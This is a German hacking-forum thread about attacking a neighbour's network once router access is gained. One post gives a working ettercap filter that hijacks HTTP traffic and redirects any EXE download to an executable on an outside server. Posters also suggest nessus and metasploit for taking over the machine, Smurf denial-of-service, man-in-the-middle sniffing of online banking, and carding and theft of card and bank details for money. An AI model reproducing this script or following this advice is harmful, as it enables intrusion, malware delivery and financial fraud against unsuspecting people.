Wie mache ich das?^^
Naja ich hab vlt. bald Zugriff auf den Router, das kann auch nicht schlecht sein...
nmap ist was?
edit: google hilft^^ http://de.wikipedia.org/wiki/Nmap
Wie mache ich das?^^
Naja ich hab vlt. bald Zugriff auf den Router, das kann auch nicht schlecht sein...
nmap ist was?
edit: google hilft^^ http://de.wikipedia.org/wiki/Nmap
wenn du kontrolle über sein system willst, könntest du einmal nessus + metasploit versuchen, oder du manipulierst gleich den ganzen traffic mit ettercap und ersetzt sämtliche downloadanfragen von exe dateien mit deinem server (und hoffst, dass er keinen verdacht schöpft^^):
Code:# replace rmccurdy with your website # replace the url with what ever exe you like if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Rubbish!"); # note: replacement string is same length as original string msg("zapped Accept-Encoding!\n"); } } if (ip.proto == TCP && tcp.src == 80) { replace("keep-alive", "close" "); replace("Keep-Alive", "close" "); } if (ip.proto == TCP && search(DATA.data, ": application") ){ # enable for logging log(DECODED.data, "/tmp/log.log"); msg("found EXE\n"); # "Win32" is the first part of the exe example: # if the EXE started with "this program must be run in MSDOS mode" you could search for MSDOS etc .. if (search(DATA.data, "Win32")) { msg("doing nothing\n"); } else { replace("200 OK", "301 Moved Permanently Location: http://www.rmccurdy.com/scripts/quickclean.exe "); msg("redirect success\n"); } }
Naja, wenn es ein größeres Netzwerk mit mehreren Rechnern ist, kannste jemanden mit einer Smurf-Attacke aus dem Netz DOSen.
Ein wenig BlackHat-iger wäre ein Man-in-the-Middle-Angriff, um beispielsweise SSL-gesicherte OnlineBanking Aktivitäten auszuhorchen.
~~ Das soll keine Anleitung sein, sondern nur eine Aufzeigung der Möglichkeiten. ~~
Grüße
atbash
[S] R34l L33t-H4(K3|2 bUDdY 4 m3
Jetzt mal im Ernst: Warum so ein Aufwand um einen einzigen Computer (mit was auch immer) zu infizieren?
Das war ja nicht die Frage...
Das ist dasselbe, wie wenn man fragt zum Beispiel fragt, warum man sich eine Blind SQL injection in einem Pferdeforum antut?!
Einfach weil mans kann, oder weils Spaß macht.
DoS find ich macht auch nicht viel Sinn, und trotzdem ist es für viele Leute einfach eine Genugtuung.
Und beim MITM-Angriff stehen denke ich finanzielle Gründe im Vordergrund, oder vielleicht noch ein 'höheres' Ziel.
Grüße
atbash
Geändert von Atbash (09.09.2009 um 08:07 Uhr)
[S] R34l L33t-H4(K3|2 bUDdY 4 m3
Weil man den Dump von 'nem Pferdeforum genauso gut cracken kann wie den aus 'nem Gayforum?
Ist doch scheiß egal mit welchem Thema sich das Board befasst, hauptsache die Userzahlen stimmen. Von daher kein überzeugendes Argument...
Was du jetzt anstellen kannst:
1. Du kannst kostenlos im Internet deines Nachbarn surfen!!!11einseinsölf
2. Du kannst nach herzenslust Faken & Carden
3. Be creative!
Ich wollte damit nur sagen, dass mir sehr wohl einige Dinge einfallen würde, die man ausser kostenlos Surfen noch machen kann. Das war ja quasi auch die Frage.
Und ein MITM-Angriff würde, um Kreditkarteninformationen, oder Bankverbindungen rauszufinden schon lohnen. Ist halt aufwändig, aber ist doch scheiß egal, wenns uns nicht irgendwie jucken würde, wären wir alle nicht in dem board hier.
Grüße
atbash
[S] R34l L33t-H4(K3|2 bUDdY 4 m3